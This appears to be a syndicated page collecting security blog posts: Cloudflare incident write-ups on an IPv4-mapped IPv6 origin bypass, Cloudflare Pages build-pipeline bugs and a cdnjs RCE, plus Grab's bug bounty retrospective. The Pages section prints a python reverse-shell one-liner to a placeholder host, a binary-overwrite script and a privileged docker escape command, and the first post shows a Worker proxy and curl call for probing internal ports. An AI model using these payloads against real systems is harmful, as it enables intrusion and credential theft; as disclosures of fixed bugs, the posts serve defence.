	23:58	Team investigates if other products are affected. Load Balancers and Spectrum are potential targets. Both products are found to be unaffected by the vulnerability.
28 November 2022	21:14	A permanent fix is ready
29 November 2022	21:34	Permanent fix is merged

Blocking exploitation

Immediately after the vulnerability was reported to our Bug Bounty program, the team began working to understand the issue and find ways to quickly block potential exploitation. It was determined that the fastest way to prevent exploitation would be to block the creation of the DNS records required to execute the attack.

The team then began to implement a patch to prevent the creation of DNS records that include IPv6 addresses that map loopback or RFC 1918 (internal) IPv4 addresses. The fix was fully deployed and confirmed three hours after the report was filed. We later realized that this change was insufficient because records hosted on external DNS servers could also be used in this attack.

The exploit

The exploit provided consisted of the following: a DNS entry, and a Cloudflare Worker. The DNS entry was an AAAA record pointing to ::ffff:127.0.0.1:

exploit.example.com AAAA ::ffff:127.0.0.1

The worker included the following code:

export default {
    async fetch(request) {
        const requestJson = await request.json()
        return fetch(requestJson.url, requestJson)
    }
}

The Worker was given a custom URL such as proxy.example.com.

With that setup, it was possible to make the worker attempt connections on the loopback interface of the server where it was running. The call would look like this:

curl https://proxy.example.com/json -d '{"url":"http://exploit.example.com:80/url_path"}'

The attack could then be scripted to attempt to connect to multiple ports on the server.

It was also found that a similar setup could be used with other IPv4 addresses to attempt connections into internal services. In this case, the DNS entry would look like:

exploit.example.com AAAA ::ffff:10.0.0.1

This exploit would allow an attacker to connect to services running on the loopback interface of the server. If the attacker was able to bypass the security and authentication mechanisms of a service, it could impact the confidentiality and integrity of data. For services running on other servers, the attacker could also use the worker to attempt connections and map services available over the network. As in most networks, Cloudflare’s network policies and ACLs must allow a few ports to be accessible. These ports would be accessible by an attacker using this exploit.

Investigation

We started an investigation to understand the root cause of the problem and created a proof-of-concept that allowed the team to debug the issue. At the same time, we started a parallel investigation to determine if the issue had been previously exploited.

It all happened when two bugs collided.

The first bug happened in our internal DNS system which is responsible for mapping hostnames to IP addresses of our customers’ origin servers (the DNS system). When the DNS system tried to answer a query for the DNS record from exploit.example.com, it serialized the IP as a string. The Golang net library used for DNS automatically converted the IP ::ffff:10.0.0.1 to string “10.0.0.1”. However, the DNS system still treated it as an IPv6 address. So a query response {ipv6: “10.0.0.1”} was returned.

The second bug was in our internal HTTP system (the proxy) which is responsible for forwarding HTTP traffic to customer’s origin servers. The bug happened in how the proxy validates this DNS response, {ipv6: “10.0.0.1”}. The proxy has two deny lists of IPs that are not allowed to be used, one for IPv4 and one for IPv6. These lists contain localhost IPs and private IPs. The bug was that the proxy system compared the address 10.0.0.1 against the IPv6 deny list because the address was in the “ipv6” section. Naturally the address didn’t match any entry in the deny list. So the address was allowed to be used as an origin IP address.

The second investigation team searched through the logs and found no evidence of previous exploitation of this vulnerability. The team also checked Cloudflare DNS for entries using IPv4-mapped IPv6 addresses and determined that all the existing entries had been used for testing purposes. As of now, there are no signs that this vulnerability could have been previously used against Cloudflare systems.

Remediating the vulnerability

To address this issue we implemented a fix in the proxy service to correctly use the deny list of the parsed address, not the deny list of the IP family the DNS API response claimed to be, to validate the IP address. We confirmed both in our test and production environments that the fix did prevent the issue from happening again.

Beyond maintaining a bug bounty program, we regularly perform internal security reviews and hire third-party firms to audit the software we develop. But it is through our bug bounty program that we receive some of the most interesting and creative reports. Each report has helped us improve the security of our services. We invite those that find a security issue in any of Cloudflare’s services to report it to us through HackerOne.

The Cloudflare Bug Bounty program and Cloudflare Pages

2022-05-06 Evan Johnson

Post Syndicated from Evan Johnson original https://blog.cloudflare.com/pages-bug-bounty/

The Cloudflare Bug Bounty program and Cloudflare Pages

The Cloudflare Pages team recently collaborated closely with security researchers at Assetnote through our Public Bug Bounty. Throughout the process we found and have fully patched vulnerabilities discovered in Cloudflare Pages. You can read their detailed write-up here. There is no outstanding risk to Pages customers. In this post we share information about the research that could help others make their infrastructure more secure, and also highlight our bug bounty program that helps to make our product more secure.

Cloudflare cares deeply about security and protecting our users and customers — in fact, it’s a big part of the reason we’re here. But how does this manifest in terms of how we run our business? There are a number of ways. One very important prong of this is our bug bounty program that facilitates and rewards security researchers for their collaboration with us.

But we don’t just fix the security issues we learn about — in order to build trust with our customers and the community more broadly, we are transparent about incidents and bugs that we find.

Recently, we worked with a group of researchers on improving the security of Cloudflare Pages. This collaboration resulted in several security vulnerability discoveries that we quickly fixed. We have no evidence that malicious actors took advantage of the vulnerabilities found. Regardless, we notified the limited number of customers that might have been exposed.

In this post we are publicly sharing what we learned, and the steps we took to remediate what was identified. We are thankful for the collaboration with the researchers, and encourage others to use the bounty program to work with us to help us make our services — and by extension the Internet — more secure!

What happens when a vulnerability is reported?

Once a vulnerability has been reported via HackerOne, it flows into our vulnerability management process:

We investigate the issue to understand the criticality of the report.
We work with the engineering teams to scope, implement, and validate a fix to the problem. For urgent problems we start working with engineering immediately, and less urgent issues we track and prioritize alongside engineering’s normal bug fixing cadences.
Our Detection and Response team investigates high severity issues to see whether the issue was exploited previously.

This process is flexible enough that we can prioritize important fixes same-day, but we never lose track of lower criticality issues.

What was discovered in Cloudflare Pages?

The Pages team had to solve a pretty difficult problem for Cloudflare Builds (our CI/CD build pipeline): how can we run untrusted code safely in a multi-tenant environment? Like all complex engineering problems, getting this right has been an iterative process. In all cases, we were able to quickly and definitively address bugs reported by security researchers. However, as we continued to work through reports by the researchers, it became clear that our initial build architecture decisions provided too large an attack surface. The Pages team pivoted entirely and re-architected our platform in order to use gVisor and further isolate builds.

When determining impact, it is not enough to find no evidence that a bug was exploited, we must conclusively prove that it was not exploited. For almost all the bugs reported, we found definitive signals in audit logs and were able to correlate that data exclusively against activity by trusted security researchers.

However, for one bug, while we found no evidence that the bug was exploited beyond the work of security researchers, we were not able meaningfully prove that it was not. In the spirit of full transparency, we notified all Pages users that may have been impacted.

Now that all the issues have been remedied, and individual customers have been notified, we’d like to share more information about the issues.

Bug 1: Command injection in CLONE_REPO

With a flaw in our logic during build initialization, it was possible to execute arbitrary code, echo environment variables to a file and then read the contents of that file.

The crux of the bug was that root_dir in this line of code was attacker controlled. After gaining control the researcher was able to specially craft a malicious root_dir to dump the environment variables of the process to a file. Those environment variables contained our GitHub bot’s authorization key. This would have allowed the attacker to read the repositories of other Pages’ customers, and many of those repositories are private.

After fixing the input validation for this field to prevent the bug, and rolling the disclosed keys, we investigated all other paths that had ever been set by our Pages customers to see if this attack had ever been performed by any other (potentially malicious) security researchers. We had logs showing that this was the first this particular attack had ever been performed, and responsibly reported.

Bug 2: Command injection in PUBLISH_ASSETS

This bug is nearly identical to the first one, but on the publishing step instead of the clone step. We went to work rotating the secrets that were exposed, fixing the input validation issues, and rotating the exposed secrets. We investigated the Cloudflare audit logs to confirm that the sensitive credentials had not been used by anyone other than our build infrastructure, and within the scope of the security research being performed.

Bug 3: Cloudflare API key disclosure in the asset publishing process

While building customer pages, a program called /opt/pages/bin/pages-metadata-generator is involved. This program had the Linux permissions of 777, allowing all users on the machine to read the program, execute the program, but most importantly overwrite the program. If you can overwrite the program prior to its invocation, the program might run with higher permissions when the next user comes along and wants to use it.

In this case the attack is simple. When a Pages build runs, the following build.sh is specified to run, and it can overwrite the executable with a new one.

#!/bin/bash
cp pages-metadata-generator /opt/pages/bin/pages-metadata-generator

This allows the attacker to provide their own pages-metadata-generator program that is run with a populated set of environment variables. The proof of concept provided to Cloudflare was this minimal reverse shell.

#!/bin/bash
echo "henlo fren"
export > /tmp/envvars
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("x.x.x.x.x",9448));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'

With a reverse shell, the attackers only need to run `env` to see a list of environment variables that the program was invoked with. We fixed the file permissions of the process, rotated the credentials, and investigated in Cloudflare audit logs to confirm that the sensitive credentials had not been used by anyone other than our build infrastructure, and within the scope of the security research.

Bug 4: Bash path injection

This issue was very similar to Bug 3. The PATH environment variable contained a large set of directories for maximum compatibility with different developer tools.

PATH=/opt/buildhome/.swiftenv/bin:/opt/buildhome/.swiftenv/shims:/opt/buildhome/.php:/opt/buildhome/.binrc/bin:/usr/local/rvm/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/opt/buildhome/.cask/bin:/opt/buildhome/.gimme/bin:/opt/buildhome/.dotnet/tools:/opt/buildhome/.dotnet

Unfortunately not all of these directories were set to the proper filesystem permissions allowing a malicious version of the program bash to be written to them, and later invoked by the Pages build process. We patched this bug, rotated the impacted credentials, and investigated in Cloudflare audit logs to confirm that the sensitive credentials had not been used by anyone other than our build infrastructure, and within the scope of the security research.

Bug 5: Azure pipelines escape

Back when this research was conducted we were running Cloudflare Pages on Azure Pipelines. Builds were taking place in highly privileged containers and the containers had the docker socket available to them. Once the researchers had root within these containers, escaping them was trivial after installing docker and mounting the root directory of the host machine.

sudo docker run -ti --privileged --net=host -v /:/host -v /dev:/dev -v /run:/run ubuntu:latest

Once they had root on the host machine, they were able to recover Azure DevOps credentials from the host which gave access to the Azure Organization that Cloudflare Pages was running within.

The credentials that were recovered gave access to highly audited APIs where we could validate that this issue was not previously exploited outside this security research.

Bug 6: Pages on Kubernetes

After receipt of the above bugs, we decided to change the architecture of Pages. One of these changes was migration of the product from Azure to Kubernetes, and simplifying the workflow, so the attack surface was smaller and defensive programming practices were easier to implement. After the change, Pages builds are within Kubernetes Pods and are seeded with the minimum set of credentials needed.

As part of this migration, we left off a very important iptables rule in our Kubernetes control plane, making it easy to curl the Kubernetes API and read secrets related to other Pods in the cluster (each Pod representing a separate Pages build).

curl -v -k [http://10.124.200.1:10255/pods](http://10.124.200.1:10255/pods)

We quickly patched this issue with iptables rules to block network connections to the Kubernetes control plane. One of the secrets available to each Pod was the GitHub OAuth secret which would have allowed someone who exploited this issue to read the GitHub repositories of other Pages’ customers.

In the previously reported issues we had robust logs that showed us that the attacks that were being performed had never been performed by anyone else. The logs related to inspecting Pods were not available to us, so we decided to notify all Cloudflare Pages customers that had ever had a build run on our Kubernetes-based infrastructure. After patching the issue and investigating which customers were impacted, we emailed impacted customers on February 3 to tell them that it’s possible someone other than the researcher had exploited this issue, because our logs couldn’t prove otherwise.

Takeaways

We are thankful for all the security research performed on our Pages product, and done so at such an incredible depth. CI/CD and build infrastructure security problems are notoriously hard to prevent. A bug bounty that incentivizes researchers to keep coming back is invaluable, and we appreciate working with researchers who were flexible enough to perform great research, and work with us as we re-architected the product for more robustness. An in-depth write-up of these issues is available from the Assetnote team on their website.

More than this, however, the work of all these researchers is one of the best ways to test the security architecture of any product. While it might seem counter-intuitive after a post listing out a number of bugs, all these diligent eyes on our products allow us to feel much more confident in the security architecture of Cloudflare Pages. We hope that our transparency, and our description of the work done on our security posture, enables you to feel more confident, too.

Finally: if you are a security researcher, we’d love to work with you to make our products more secure. Check out hackerone.com/cloudflare for more info!

Cloudflare’s Handling of an RCE Vulnerability in cdnjs

2021-07-24 Jonathan Ganz

Post Syndicated from Jonathan Ganz original https://blog.cloudflare.com/cloudflares-handling-of-an-rce-vulnerability-in-cdnjs/

Cloudflare's Handling of an RCE Vulnerability in cdnjs

cdnjs provides JavaScript, CSS, images, and fonts assets for websites to reference with more than 4,000 libraries available. By utilizing cdnjs, websites can load faster with less strain on one’s own origin server as files are served directly from Cloudflare’s edge. Recently, a blog post detailed a vulnerability in the way cdnjs’ backend automatically keeps the libraries up to date.

This vulnerability allowed the researcher to execute arbitrary code, granting the ability to modify assets. This blog post details how Cloudflare responded to this report, including the steps we took to block exploitation, investigate potential abuse, and remediate the vulnerability.

This vulnerability is not related to Cloudflare CDN. The cdnjs project is a platform that leverages Cloudflare’s services, but the vulnerability described below relates to cdnjs’ platform only. To be clear, no existing libraries were modified using this exploit. The researcher published a new package which demonstrated the vulnerability and our investigation concluded that the integrity of all assets hosted on cdnjs remained intact.

Disclosure Timeline

As outlined in RyotaK’s blog post, the incident began on 2021-04-06. At around 1100 GMT, RyotaK published a package to npm exploiting the vulnerability. At 1129 GMT, cdnjs processed this package, resulting in a leak of credentials. This triggered GitHub alerting which notified Cloudflare of the exposed secrets.

Cloudflare disabled the auto-update service and revoked all credentials within an hour. In the meantime, our security team received RyotaK’s remote code execution report through HackerOne. A new version of the auto-update tool which prevents exploitation of the vulnerability RyotaK reported was released within 24 hours.

Having taken action immediately to prevent exploitation, we then proceeded to redesign the auto-update pipeline. Work to completely redesign it was completed on 2021-06-03.

Blocking Exploitation

Before RyotaK reported the vulnerability via HackerOne, Cloudflare had already taken action. When GitHub notified us that credentials were leaked, one of our engineers took immediate action and revoked them all. Additionally, the GitHub token associated with this service was automatically revoked by GitHub.

The second step was to bring the vulnerable service offline to prevent further abuse while we investigated the incident. This prevented exploitation but also made it impossible for legitimate developers to publish updates to their libraries. We wanted to release a fixed version of the pipeline used for retrieving and hosting new library versions so that developers could continue to benefit from caching. However, we understood that a stopgap was not a long term fix, and we decided to review the entire current solution to identify a better design that would improve the overall security of cdnjs.

Investigation

Any sort of investigation requires access to logs and all components of our pipeline generate extensive logs that prove valuable for forensics efforts. Logs produced by the auto-update process are collected in a GitHub repository and sent to our logging pipeline. We also collect and retain logs from cdnjs’ Cloudflare account. Our security team began reviewing this information as soon as we received RyotaK’s initial report. Based on access logs, API token usage, and file modification metadata, we are confident that only RyotaK exploited this vulnerability during his research and only on test files. To rule out abuse, we reviewed the list of source IP addresses that accessed the Workers KV token prior to revoking it and only found one, which belongs to the cdnjs auto-update bot.

The cdnjs team also reviewed files that were pushed to the cdnjs/cdnjs GitHub repository around that time and found no evidence of any other abuse across cdnjs.

Remediating the Vulnerability

Around half of the libraries on cdnjs use npm to auto-update. The primary vector in this attack was the ability to craft a .tar.gz archive with a symbolic link and publish it to the npm registry. When our pipeline extracted the content it would follow symlinks and overwrite local files using the pipeline user privileges. There are two fundamental issues at play here: an attacker can perform path traversal on the host processing untrusted files, and the process handling the compressed file is overly privileged.

We addressed the path traversal issue by checking that the destination of each file in the tarball will be contained within the target directory that the update process has designated for that package. If the file’s full canonical path doesn’t begin with the destination directory’s full path, we log this as a warning and skip extracting that file. This works fairly well, but as noted in the comment above this check, if the compressed file uses UTF-8 encoding for filenames, this check may not properly canonicalize the path. If this canonicalization does not occur, the path may contain path traversal, even though it starts with the correct destination path.

To ensure that other vulnerabilities in cdnjs’ publication pipeline cannot be exploited, we configured an AppArmor profile for it. This limits the capabilities of the service, so even if an attacker successfully instructed the process to perform an action, the operating system (kernel / security feature) will not allow any action outside of what it is allowed to do.

For illustration, here’s an example:

/path/to/bin {
  network,
  signal,
  /path/to/child ix,
  /tmp/ r,
  /tmp/cache** rw,
  ...
}

In this example, we only allow the binary (/path/to/bin) to:

access all networking
use all signals
execute /path/to/child (which will inherit the AppArmor profile)
read from /tmp
read+write under /tmp/cache.

Any attempt to access anything else will be denied. You can find the complete list of capabilities and more information on AppArmor’s manual page.

In the case of cdnjs’ autoupdate tool, we limit execution of applications to a very specific set, and we limit where files can be written.

Fixing the path traversal and implementing the AppArmor profile prevents similar issues from being exploited. However, having a single layer of defense wasn’t enough. We decided to completely redesign the auto-update process entirely to isolate each step, as well as each library it processes, thus preventing this entire class of attacks.

Redesigning the system

The main idea behind the redesign of the pipeline was to move away from the monolithic auto-update process. Instead, various operations are done using microservices or daemons which have well-defined scopes. Here’s an overview of the steps:

First, to detect new library versions, two daemons (for both npm and git based updates) are regularly running. Once a new version has been detected, the files will be downloaded as an archive and placed into the incoming storage bucket.

Writing a new version in the incoming bucket triggers a function that adds all the information we need to update the library. The function also generates a signed URL allowing for writing in the outgoing bucket, but only in a specific folder for a given library, reducing the blast radius. Finally, a message is placed into a queue to indicate that the new version of the given library is ready to be published.

A daemon listens for incoming messages and spawns an unprivileged Docker container to handle dangerous operations (archive extraction, minifications, and compression). After the sandbox exits, the daemon will use the signed URL to store the processed files in the outgoing storage bucket.

Finally, multiple daemons are triggered when the finalized package is written to the outgoing bucket. These daemons publish the assets to cdnjs.cloudflare.com and to the main cdnjs repository. The daemons also publish the version specific URL, cryptographic hash, and other information to Workers KV, cdnjs.com, and the API.

In this revised design, exploiting a similar vulnerability would happen in the sandbox (Docker container) context. The attacker would have access to container files, but nothing else. The container is minimal, ephemeral, has no secrets included, and is dedicated to a single library update, so it cannot affect other libraries’ files.

Our Commitment to Security

Beyond maintaining a vulnerability disclosure program, we regularly perform internal security reviews and hire third-party firms to audit the software we develop. But it is through our vulnerability disclosure program that we receive some of the most interesting and creative reports. Each report has helped us improve the security of our services. In this case, we worked with RyotaK to not only address the vulnerability, but to also ensure that their blog post was detailed and accurate. We invite those that find a security issue in any of Cloudflare’s services to report it to us through HackerOne.

Reflecting on the five years of Bug Bounty at Grab

2020-12-16 Grab Tech

Post Syndicated from Grab Tech original https://engineering.grab.com/reflecting-on-the-five-years-of-bug-bounty-at-grab

Security has always been a top-priority at Grab; our product security team works round-the-clock to ensure that our customers’ data remains safe. Five years ago, we launched our private bug bounty program on HackerOne, which evolved into a public program in August 2017. The idea was to complement the security efforts our team has been putting through to keep Grab secure. We were a pioneer in South East Asia to implement a public bug bounty program, and now we stand among the Top 20 programs on HackerOne worldwide.

We started as a private bug bounty program which provided us with fantastic results, thus encouraging us to increase our reach and benefit from the vibrant security community across the globe which have helped us iron-out security issues 24×7 in our products and infrastructure. We then publicly launched our bug bounty program offering competitive rewards and hackers can even earn additional bonuses if their report is well-written and display an innovative approach to testing.

In 2019, we also enrolled ourselves in the Google Play Security Reward Program (GPSRP), Offered by Google Play, GPSRP allows researchers to re-submit their resolved mobile security issues directly and get additional bounties if the report qualifies under the GPSRP rules. A selected number of Android applications are eligible, including Grab’s Android mobile application. Through the participation in GPSP, we hope to give researchers the recognition they deserve for their efforts.

In this blog post, we’re going to share our journey of running a bug bounty program, challenges involved and share the learnings we had on the way to help other companies in SEA and beyond to establish and build a successful bug bounty program.

Transitioning from Private to a Public Program

At Grab, before starting the private program, we defined policy and scope, allowing us to communicate the objectives of our bug bounty program and list the targets that can be tested for security issues. We did a security sweep of the targets to eliminate low-hanging security issues, assigned people from the security team to take care of incoming reports, and then launched the program in private mode on HackerOne with a few chosen researchers having demonstrated a history of submitting quality submissions.

One of the benefits of running a private bug bounty program is to have some control over the number of incoming submissions of potential security issues and researchers who can report issues. This ensures the quality of submissions and helps to control the volume of bug reports, thus avoiding overwhelming a possibly small security team with a deluge of issues so that they won’t be overwhelming for the people triaging potential security issues. The invited researchers to the program are limited, and it is possible to invite researchers with a known track record or with a specific skill set, further working in the program’s favour.

The results and lessons from our private program were valuable, making our program and processes mature enough to open the bug bounty program to security researchers across the world. We still did another security sweep, reworded the policy, redefined the targets by expanding the scope, and allocated enough folks from our security team to take on the initial inflow of reports which was anticipated to be in tune with other public programs.

Noticeable spike in the number of incoming reports as we went public in July 2017.

Lessons Learned from the Public Program

Although we were running our bug bounty program in private for sometime before going public, we still had not worked much on building standard operating procedures and processes for managing our bug bounty program up until early 2018. Listed below, are our key takeaways from 2018 till July 2020 in terms of improvements, challenges, and other insights.

Response Time: No researcher wants to work with a bug bounty team that doesn’t respect the time that they are putting into reporting bugs to the program. We initially didn’t have a formal process around response times, because we wanted to encourage all security engineers to pick-up reports. Still, we have been consistently delivering a first response to reports in a matter of hours, which is significantly lower than the top 20 bug bounty programs running on HackerOne. Know what structured (or unstructured) processes work for your team in this area, because your program can see significant rewards from fast response times.
Time to Bounty: In most bug bounty programs the payout for a bug is made in one of the following ways: full payment after the bug has been resolved, full payment after the bug has been triaged, or paying a portion of the bounty after triage and the remaining after resolution. We opt to pay the full bounty after triage. While we’re always working to speed up resolution times, that timeline is in our hands, not the researcher’s. Instead of making them wait, we pay them as soon as impact is determined to incentivize long-term engagement in the program.
Noise Reduction: With HackerOne Triage and Human-Augmented Signal, we’re able to focus our team’s efforts on resolving unique, valid vulnerabilities. Human-Augmented Signal flags any reports that are likely false-positives, and Triage provides a validation layer between our security team and the report inbox. Collaboration with the HackerOne Triage team has been fantastic and ultimately allows us to be more efficient by focusing our energy on valid, actionable reports. In addition, we take significant steps to block traffic coming from networks running automated scans against our Grab infrastructure and we’re constantly exploring this area to actively prevent automated external scanning.
Team Coverage: We introduced a team scheduling process, in which we assign a security engineer (chosen during sprint planning) on a weekly basis, whose sole responsibility is to review and respond to bug bounty reports. We have integrated our systems with HackerOne’s API and PagerDuty to ensure alerts are for valid reports and verified as much as possible.

Looking Ahead

In one area we haven’t been doing too great is ensuring higher rates of participation in our core mobile applications; some of the pain points researchers have informed us about while testing our applications are:

Researchers’ accounts are getting blocked due to our anti-fraud checks.
Researchers are not able to register driver accounts (which is understandable as our driver-partners have to go through manual verification process)
Researchers who are not residing in the Southeast Asia region are unable to complete end-to-end flows of our applications.

We are open to community feedback and how we can improve. We want to hear from you! Please drop us a note at [email protected] for any program suggestions or feedback.

Last but not least, we’d like to thank all researchers who have contributed to the Grab program so far. Your immense efforts have helped keep Grab’s businesses and users safe. Here’s a shoutout to our program’s top-earning hackers 🏆:

Ranking	Overall Top 3 Researchers	Year 2019/2020 Top 3 Researchers
1	@reptou	@reptou
2	@quanyang	@alexeypetrenko
3	@ngocdh	@chaosbolt

Lastly, here is a special shoutout to @bagipro who has done some great work and testing on our Grab mobile applications!

Well done and from everyone on the Grab team, we look forward to seeing you on the program!

Join us

Grab is more than just the leading ride-hailing and mobile payments platform in Southeast Asia. We use data and technology to improve everything from transportation to payments and financial services across a region of more than 620 million people. We aspire to unlock the true potential of Southeast Asia and look for like-minded individuals to join us on this ride.

If you share our vision of driving South East Asia forward, apply to join our team today.

What was the vulnerability?

What is request smuggling?

Request smuggling vulnerability in Pingora

CDN request smuggling and hijacking

Remediation and next steps

Timeline

Conclusion

Summary of the amplification attack

Transport and security handshakes

Broadcast addresses

Dealing with the expected broadcast

Binding IP address ranges to hosts

Vulnerability discovery

Mitigation

Next steps

Bug bounty VIP program

What is in scope for the new VIP program?

The VIP program’s new & enhanced reward structure

What outcomes are we driving with the new VIP program?

How does Cloudflare benefit from it?

How can you help?

How does the side-channel attack work?

Mitigating LLM side-channel attacks

What we did

Workers AI, our inference product, is now protected

One step further: AI Gateway protects users of any inference provider

Conclusion

Highlights from 2023

What’s next?

A word of thanks

Join us

Blocking exploitation

The exploit

Investigation

Remediating the vulnerability

What happens when a vulnerability is reported?

What was discovered in Cloudflare Pages?

Bug 1: Command injection in CLONE_REPO

Bug 2: Command injection in PUBLISH_ASSETS

Bug 3: Cloudflare API key disclosure in the asset publishing process

Bug 4: Bash path injection

Bug 5: Azure pipelines escape

Bug 6: Pages on Kubernetes

Takeaways

Disclosure Timeline

Blocking Exploitation

Investigation

Remediating the Vulnerability

Redesigning the system

Our Commitment to Security

Transitioning from Private to a Public Program

Lessons Learned from the Public Program

Looking Ahead

Join us

The collective thoughts of the interwebz